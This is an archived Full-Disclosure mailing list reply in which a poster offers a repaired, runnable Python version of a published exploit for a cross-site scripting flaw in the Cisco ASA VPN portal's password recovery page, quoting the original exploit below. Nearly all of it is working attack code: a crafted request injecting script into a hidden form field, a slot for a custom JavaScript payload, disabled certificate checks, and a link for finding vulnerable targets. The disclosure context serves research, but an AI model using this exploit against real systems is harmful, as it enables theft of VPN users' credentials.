lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <CAOOpvAqwULPVbT9r0WcUx9+_yTE7AnptQsNwL9LDENSR3Yu-7w@mail.gmail.com>
Date: Thu, 18 Feb 2016 10:03:56 -0600
From: Joey Maresca <jmaresca@...il.com>
Cc: fulldisclosure@...lists.org
Subject: Re: [FD] Cisco ASA VPN - Zero Day Exploit

For folks who want code that runs, I did you all a favor, fixed the ident
issues, removed unused libraries, fixed SSL certificate validation checks
causing failures, fixed typos that prevent running, killed dead code, made
sure it actually used the Port input. All while stripping out the
unnecessary fluff. It may not be perfect but it will at least now run.


import string, sys
import ssl, socket, httplib

if __name__ == '__main__':
        try:
                Target = sys.argv[1]
                Port = int(sys.argv[2])
                # Here goes your custom JS agent code
                Payload = "alert(1)"
                VulnerableURL =
"/+CSCOE+/logon.html?reason=2&a0=63&a1=&a2=&a3=0&next=&auth_handle=&status=0&username=juansacco%22%20accesskey%3dX%20onclick%3d"
+ Payload + "%20sacco&password_min=0&state=&tgroup=&serverType=0&password_"
                CraftedRequest = VulnerableURL

                # Start the connection
                connection =
httplib.HTTPSConnection(Target,Port,context=ssl._create_unverified_context())
                connection.request('GET', CraftedRequest)
                Response = connection.getresponse()
                print "Server status response:", Response.status,
Response.reason
                data = Response.read()
                vulnerable = "Target is not vulnerable"

                for line in str(data).splitlines():
                        if "juansacco" in line:
                                vulnerable = "Targer is vulnerable"
                        if vulnerable != "Not vulnerable":
                                print "Result of the test:", vulnerable

                # Find the injection on the response
                connection.close()

        except Exception,e:
                print "Exploit connection closed " + str(e)

On Wed, Feb 17, 2016 at 4:11 AM, Juan Sacco <juansacco@...il.com> wrote:

> # Exploit author: Juan Sacco - jsacco@...loitpack.com
> # Affected program: Cisco ASA VPN Portal - Zero Day
> # Cisco ASA VPN is prone to a XSS on the password recovery page.
> # This vulnerability can be used by an attacker to capture other user's
> credentials.
> # The password recovery form fails to filter properly the hidden inputs
> fields.
> #
> # This Zero Day exploit has been developed and discovered by Juan Sacco.
> # Exploit Pack - Team http://exploitpack.com
> #
> # Release Dates:
> # Reported to Cisco PSIRT Feb 4/2016
> # Cisco Dev Team working on a fix Feb 15/2016
> # Cisco PSIRT report a CVE Feb 15/2016
> # Exploit Pack disclose the bug Feb 15/2016
> # Disclosure of the Exploit Feb 16/2016
> #
> # Look for vulnerable targets here:
> https://www.google.nl/#safe=off&q=+%2F%2BCSCOE%2B%2F
> # More than 18.000 results in Google only
>
> import string, sys
> import socket, httplib
> import telnetlib
>
> def run():
>    try:
>     Target = sys.argv[1]
> Port = int(sys.argv[2])
> # Here goes your custom JS agent code
> Payload = "alert(1)"
> VulnerableURL =
>
> "/+CSCOE+/logon.html?reason=2&a0=63&a1=&a2=&a3=0&next=&auth_handle=&status=0&username=juansacco%22%20accesskey%3dX%20onclick%3d"
> + Payload + "%20sacco&password_min=0&state=&tgroup=&serverType=0&password_"
> CraftedRequest = VulnerableURL
>   # Start the connection
> connection = httplib.HTTPSConnection(Target)
> connection.request('GET', CraftedRequest)
> Response = connection.getresponse()
> print "Server status response:", Response.status, Response.reason
> data =  Response.read()
> vulnerable = "Target is not vulnerable"
> for line in str(data).splitlines():
> if "juansacco\\\"" in line:
> vulnerable = "Targer is vulnerable"
> if vulnerable != "Not vulnerable":
> print "Result of the test:", vulnerable
> # Find the injection on the response
> connection.close()
>    except Exception,e:
>      print "Exploit connection closed " + str(e)
>
> if __name__ == '__main__':
>    print "Cisco VPN ASA Exploit - Zero Day"
>    print "################################"
>    print "Author: Juan Sacco - jsacco@...loitpack.com"
>
>    try:
>      Target = sys.argv[1]
>      Port = sys.argv[2]
>    except IndexError:
>      pass
> run()
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
>

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists